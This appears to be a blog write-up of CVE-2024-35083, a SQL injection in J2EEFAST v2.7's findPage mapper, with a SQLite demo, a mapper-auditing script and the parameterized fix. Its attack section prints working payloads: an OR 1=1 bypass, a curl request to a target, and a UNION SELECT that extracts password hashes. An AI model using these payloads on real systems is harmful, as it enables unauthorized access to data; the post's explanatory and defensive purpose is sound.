A security vulnerability, CVE-2024-35083, has been discovered in J2EEFAST v2.7., a popular Java-based rapid development framework. The flaw is a SQL injection vulnerability located in the findPage function within the SysLoginInfoMapper.xml file. Attackers can exploit this bug to execute arbitrary SQL statements, potentially gaining unauthorized access to sensitive data or compromising the underlying database.
In this post, we will break down the vulnerability, show simple code snippets, describe how the exploit works, and point to official references.
What is SQL Injection?
SQL Injection (SQLi) occurs when user input is not correctly filtered for SQL statements, allowing attackers to interfere with the queries that an application makes to its database. This can lead to data leaks, data loss, and, in some cases, full control over the application.
The Vulnerable Function: findPage
The vulnerability resides in J2EEFAST v2.7. within the XML mapping file: SysLoginInfoMapper.xml. Specifically, the findPage function dynamically builds SQL queries based on user-provided input, without proper sanitization.
Here’s a (simplified) example of what the code might look like:
<!-- SysLoginInfoMapper.xml -->
<select id="findPage" resultType="SysLoginInfo">
    SELECT *
    FROM sys_login_info
    WHERE 1=1
    <if test="username != null and username != ''">
        AND username = '${username}'
    </if>
</select>
The key issue here is the use of ${username} (raw string substitution into the SQL text) instead of #{username} (parameter binding through a prepared statement). With ${} the user-supplied value becomes part of the SQL statement itself, so any SQL syntax it contains is executed by the database.
How the Attack Works
An attacker can craft a username parameter containing SQL code. For example, if the application receives input like:
username=admin' OR 1=1 --
The resulting SQL would look like this:
SELECT *
FROM sys_login_info
WHERE 1=1 AND username = 'admin' OR 1=1 --'
Because AND binds tighter than OR, the condition becomes (1=1 AND username = 'admin') OR 1=1, which is true for every row, so the query returns all records. The -- starts a SQL comment, so the rest of the line, including the closing quote that the mapper appended, is ignored.
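To make the difference between the two placeholder styles concrete, here is an added example (not code from the post or from the J2EEFAST project) that mimics, in a simplified and hypothetical way, how MyBatis treats ${} versus #{}: a tiny renderer splices ${} values straight into the SQL text and turns #{} into a bound "?" parameter. It runs the resulting statements against an in-memory SQLite table with constructed rows, so it is not the project's real database, but the outcome for the payload shown above is the same: the substituted query returns every row, the bound query returns none.

```python
import re
import sqlite3

# Constructed sample data for the demo; not real login records.
SAMPLE_ROWS = [
    (1, "admin", "203.0.113.10", "SUCCESS"),
    (2, "alice", "203.0.113.11", "SUCCESS"),
    (3, "bob", "203.0.113.12", "FAILED"),
]

# The two mapper fragments: the vulnerable ${} form and the fixed #{} form.
VULNERABLE_FRAGMENT = "SELECT * FROM sys_login_info WHERE 1=1 AND username = '${username}'"
FIXED_FRAGMENT = "SELECT * FROM sys_login_info WHERE 1=1 AND username = #{username}"

PLACEHOLDER = re.compile(r"([#$])\{(\w+)\}")


def render(fragment, values):
    """Simplified, hypothetical imitation of MyBatis placeholder handling.

    #{x} becomes a JDBC-style '?' with the value passed separately (data),
    ${x} splices the raw value into the SQL text (code).
    Returns (sql, params).
    """
    params = []

    def substitute(match):
        kind, name = match.group(1), match.group(2)
        if kind == "#":
            params.append(values[name])
            return "?"
        return str(values[name])

    return PLACEHOLDER.sub(substitute, fragment), params


def make_db():
    """Build an in-memory SQLite table standing in for sys_login_info."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sys_login_info (id INTEGER, username TEXT, ip TEXT, status TEXT)"
    )
    conn.executemany("INSERT INTO sys_login_info VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def find_page(fragment, username):
    """Run one mapper fragment with the given username; return matching usernames."""
    sql, params = render(fragment, {"username": username})
    conn = make_db()
    try:
        return sorted(row[1] for row in conn.execute(sql, params))
    finally:
        conn.close()


# The payload from the post.
PAYLOAD = "admin' OR 1=1 --"

if __name__ == "__main__":
    print("vulnerable ${}:", find_page(VULNERABLE_FRAGMENT, PAYLOAD))  # every row
    print("fixed #{}:     ", find_page(FIXED_FRAGMENT, PAYLOAD))       # no row
    print("fixed, normal: ", find_page(FIXED_FRAGMENT, "admin"))
```

With the bound form the whole string admin' OR 1=1 -- is compared against the username column as one literal value, so the quote and the comment marker never reach the SQL parser.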
Suppose a RESTful GET request is used to search logins:
GET /api/sysLoginInfo/findPage?username=admin'%20OR%201=1--
Or using curl:
curl "http://target-site/api/sysLoginInfo/findPage?username=admin'%20OR%201=1--"
If the application is vulnerable, the response will include all login records.
To extract specific columns (like a password hash), an attacker could use the UNION keyword:
username=admin' UNION SELECT password,NULL,NULL,NULL FROM sys_login_info --
To prevent this vulnerability, always use parameterized queries. For example, in MyBatis:
<if test="username != null and username != ''">
    AND username = #{username}
</if>
Here, #{username} is bound as a prepared-statement parameter: the database receives the value separately from the SQL text and treats it as data, never as part of the statement, so it cannot change the query's structure.
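The conclusion below recommends auditing XML mappers; the following is an added example of such a check, written for this post and not part of J2EEFAST. It parses a MyBatis mapper file and reports every ${...} placeholder that appears inside a SQL-bearing element (select, insert, update, delete, sql), including text nested in <if> or <where> blocks. The mapper it scans is a constructed sample: only the findPage fragment mirrors the snippet above, the findPageFixed element and its ORDER BY clause are assumptions added to show a fixed query and a deliberate ${} that an allowlist can suppress.

```python
import re
import xml.etree.ElementTree as ET

# MyBatis mapper elements whose body is SQL text.
SQL_ELEMENTS = ("select", "insert", "update", "delete", "sql")

# Matches ${name} (raw string substitution); #{name} is deliberately not matched.
RAW_SUBSTITUTION = re.compile(r"\$\{\s*([^}]+?)\s*\}")


def audit_mapper(xml_text, allow=()):
    """Return (element tag, element id, placeholder name) for every ${...}
    found in SQL-bearing elements of a mapper file.

    Names listed in `allow` are skipped, for the rare cases where ${} is
    intentional (for example a column name validated against a fixed list
    before it reaches the mapper); everything else should be reviewed or
    changed to #{} binding.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if elem.tag not in SQL_ELEMENTS:
            continue
        # itertext() concatenates the element's own text and the text of all
        # nested dynamic-SQL tags (<if>, <where>, <foreach>, ...) in order.
        body = "".join(elem.itertext())
        for name in RAW_SUBSTITUTION.findall(body):
            if name not in allow:
                findings.append((elem.tag, elem.get("id"), name))
    return findings


# Constructed mapper for the demo. findPage mirrors the post's snippet;
# findPageFixed and its orderBy parameter are hypothetical.
SAMPLE_MAPPER = """<mapper namespace="demo.SysLoginInfoMapper">
  <select id="findPage" resultType="SysLoginInfo">
    SELECT * FROM sys_login_info WHERE 1=1
    <if test="username != null and username != ''">
      AND username = '${username}'
    </if>
  </select>
  <select id="findPageFixed" resultType="SysLoginInfo">
    SELECT * FROM sys_login_info WHERE 1=1
    <if test="username != null and username != ''">
      AND username = #{username}
    </if>
    <if test="orderBy != null">ORDER BY ${orderBy}</if>
  </select>
</mapper>"""

if __name__ == "__main__":
    for tag, elem_id, name in audit_mapper(SAMPLE_MAPPER):
        print(f"{tag} id={elem_id}: raw substitution ${{{name}}} - review, or change to #{{{name}}}")
```

Run it over every *Mapper.xml in the code base (for example by globbing the resources directory and calling audit_mapper on each file's contents); a non-empty result is a finding to triage, since ${} is only defensible when the value is constrained to a fixed set of identifiers before it reaches the SQL.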
References
- CVE-2024-35083 at NVD
- OWASP SQL Injection
- J2EEFAST Official Site
Conclusion
CVE-2024-35083 is a serious SQL injection vulnerability in J2EEFAST v2.7. Any web application running this version is at risk unless patched. Attackers can read, modify, or destroy data with simple HTTP requests. Immediate patching, and an audit of XML mappers for ${} placeholders in SQL, are critical steps to protect your applications.
Timeline
Published on: 05/23/2024 17:15:30 UTC
Last modified on: 11/04/2024 20:35:06 UTC